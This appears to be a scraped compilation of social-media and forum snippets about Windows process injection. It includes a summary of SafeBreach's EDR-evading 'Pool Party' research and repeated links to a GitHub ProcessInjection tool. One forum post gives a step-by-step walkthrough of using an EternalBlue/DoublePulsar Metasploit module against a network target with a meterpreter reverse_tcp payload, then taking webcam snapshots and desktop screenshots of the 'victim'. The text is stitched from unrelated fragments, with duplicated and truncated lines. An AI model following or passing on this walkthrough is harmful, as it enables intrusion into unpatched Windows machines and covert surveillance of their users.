https://bit.ly/3tgesM8 - 🎉 SafeBreach Labs Researchers have unveiled groundbreaking process injection techniques using Windows thread pools, outwitting leading endpoint detection and response (EDR) systems. These new methods, named "Pool Party" variants, bypass current EDR solutions by injecting malicious code into legitimate processes, posing a significant challenge for traditional cybersecurity measures. #CyberSecurity #ProcessInjection 🛡️ Understanding the limitation of existing process injection techniques, researchers explored Windows thread pools as a novel vector. They developed eight unique techniques that work across all processes without limitations, enhancing their flexibility and effectiveness. These methods prove undetectable against five leading EDR solutions, highlighting a critical gap in current cyber defense strategies. #InnovationInCyberSecurity #ThreadPools 🔍 The research delved deep into the architecture of Windows thread pools, identifying potential areas for process injections. It focused on worker factories, task queues, I/O completion queues, and timer queues. The techniques involved manipulating these components to execute malicious code, revealing a sophisticated approach to cyber attacks. #TechResearch #AdvancedCyberAttacks 💻 Notably, the Pool Party variants were tested against five major EDR solutions, including Palo Alto Cortex and Microsoft Defender. All variants successfully evaded detection, demonstrating a 100% success rate. This finding underscores the need for continuous evolution and improvement in cybersecurity tools and practices. #EDRBypass #CyberThreats 🌐 The implications of this research are significant for the cybersecurity community. While EDR systems have evolved, they currently lack the capability to generically detect new process injection techniques. This research emphasizes the need for a more generic detection approach and deeper inspection of trusted processes to combat sophisticated cyber threats. #CyberDefense #InnovationInSecurity 🔗 SafeBreach has responsibly disclosed their findings and shared the research with the security community. By openly discussing these techniques at Black Hat Europe and providing a detailed GitHub repository, they aim to raise awareness and aid in the development of proactive defense strategies against such advanced attacks.

[Media] ​​ProcessInjection

​​ProcessInjection The program is designed to perform process injection. Currently the tool supports 5 process injection techniques. https://github.com/3xpl01tc0d3r/ProcessInjection #infosec #pentesting #redteam

Just wanna share it.. I'm using this msf module http://ift.tt/2onj5kG. Clone it and copy paste eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/. Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection). Now use the exploit exploit/windows/smb/eternalblue_doublepulsar. Set the necessary options like RHOST, TARGETARCHITECTURE, TARGET and PROCESSINJECT. For DOUBLEPULSARPATH and ETERNALBLUEPATH, use Eternalblue-Doublepulsar-Metasploit/deps/ directory. For example /root/Eternalblue-Doublepulsar-Metasploit/deps/. Don't forget set the PAYLOAD windows/x64/meterpreter/reverse_tcp (my target use x64 so i'm using x64 payload too).   If everything sets, now run exploit. Run some interesting command like webcam_list or webcam_snap The victim desktop screenshot.   Tested on my local network, tool used Metasploit running in Kali Linux. Thats it, happy hacking!

ProcessInjection The program is designed to perform #process injection. Currently the tool...

ProcessInjection The program is designed to perform #process injection. Currently the tool supports 4 process #injection techniques. https://github.com/3xpl01tc0d3r/ProcessInjection

GitHub - 3xpl01tc0d3r/ProcessInjection: This program is designed to demonstrate various process injection techniques - GitHub This program is designed to demonstrate various process injection techniques - GitHub - 3xpl01tc0d3r/ProcessInjection: This program is designed to demonstrate various process injection techniques